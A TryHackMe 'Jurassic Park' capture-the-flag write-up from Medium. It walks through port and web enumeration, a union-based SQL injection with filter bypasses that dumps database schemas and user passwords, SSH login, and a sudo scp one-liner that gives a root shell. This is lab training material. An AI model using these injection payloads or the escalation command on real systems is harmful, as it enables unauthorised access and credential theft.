TryHackMe: Jurassic Park

Initial foothold

  1. Port scan
nmap -Pn <target ip>nmap -Pn -p1000- <target ip>

There’re 2 open ports: 22 and 80.

2. OS and service scan

nmap -A -p22,80 <target ip>

There’re 2 services: SSH on port 22 and HTTP on port 80.

3. Vuln scan

nmap --script vuln -p22,80 <target ip>

There’s robots.txt on HTTP service.

Service Enumeration

  1. SSH
ssh <target ip>

Connecting is succeeded.

2. HTTP service

nikto scan

nikto -h http://<target ip>

Directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target>/ -x php,txt,html,sh,cgi,bak -q

Access HTTP site

/index.php

View page source, not much revealed

Follow the link to shop.php

Click on one the choices, I was redirected to /item.php?id=3

/item.php?id=1

Conclusion:

id is a parameter. Maybe I can do SQL injection.

Exploitation

  1. Intercept item.php w/ Burp Suite and send it to the Intruder

2. Supply the payload and start the attack

Here’s my payload on GitHub.

Looking at the length there’re many values. I will start w/ 407.

Try the query

" or 1=1

Failed!!!

Next is 516, I skipped 408 and 409 because It’s the same request and the length is different due to strings’ size.

' or 1=1#

There’s a filter in this system.

Try 1765

0 or 1=1

No error. Good to go.

3. Test for union injection

Before attacking, I will encode the query w/ Burp Suite’s decoder function.

0 union select

The full request will be:

0 union select 10 union select 1,20 union select 1,2,3

I will add “$” at number position.

Load the payload

Here’s my GitHub link

Start the attack, judging by the length. This machine is also vulnerable to union injection and it needs 5 columns to display the result.

Test the query

0 union select 1,2,3,4,5

Version number

0 union select 1,2,version(),4,5

Database

0 union select 1,2,database(),4,5

Get other databases

0 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

There’s only 1 interesting database: park.

Retrieve table names

0 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()

Retrieve column names of table ‘users’

0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where  table_name='users' and  table_schema=database()

I was filtered.

Change single quite (‘) to double quote (“)

0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where  table_name="users" and  table_schema=database()

Retrieve data

0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where  table_name="users" and  table_schema=database()

I was filtered. I probably filtered by column name.

Test one by one starting w/ id

0 union select 1,group_concat(id),3,4,5 from users

There’re 2 users.

username

0 union select 1,group_concat(username),3,4,5 from users

I was filtered

password

0 union select 1,group_concat(password),3,4,5 from users

I got 2 passwords.

Before trying to work around w/ ‘username’ filtering. I will retrieve data from tables ‘items’

Column name

0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where  table_name="items" and  table_schema=database()

Data

0 union select 1,group_concat(id," ",package," ",price," ",information," ",sold),3,4,5 from items

Copy and arrange it. ID #5 mentioned filtered characters.

/item.php?id=5

There’s s massage to Dennis.

Until now, there’re 2 possible usernames: dennis and Dennis

3. Try to log in w/ ssh starting w/ username: dennis and both of the passwords.

Privilege Escaltion

  1. Verify sudo
sudo -l

I can escalate w/

Here’s the command

TF=$(mktemp)echo 'sh 0<&2 1>&2' > $TFchmod 777 "$TF"sudo scp -S $TF x y:whoami

Now I’m root.

2. Finding flags

1st flag is located in /home/dennis

5th flag is located in /root

2nd flag location is hinted in /home/ubuntu/.bash_history

It’s in /boot/grub/fonts/

3rd flag is written in /home/dennis/.bash_history

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store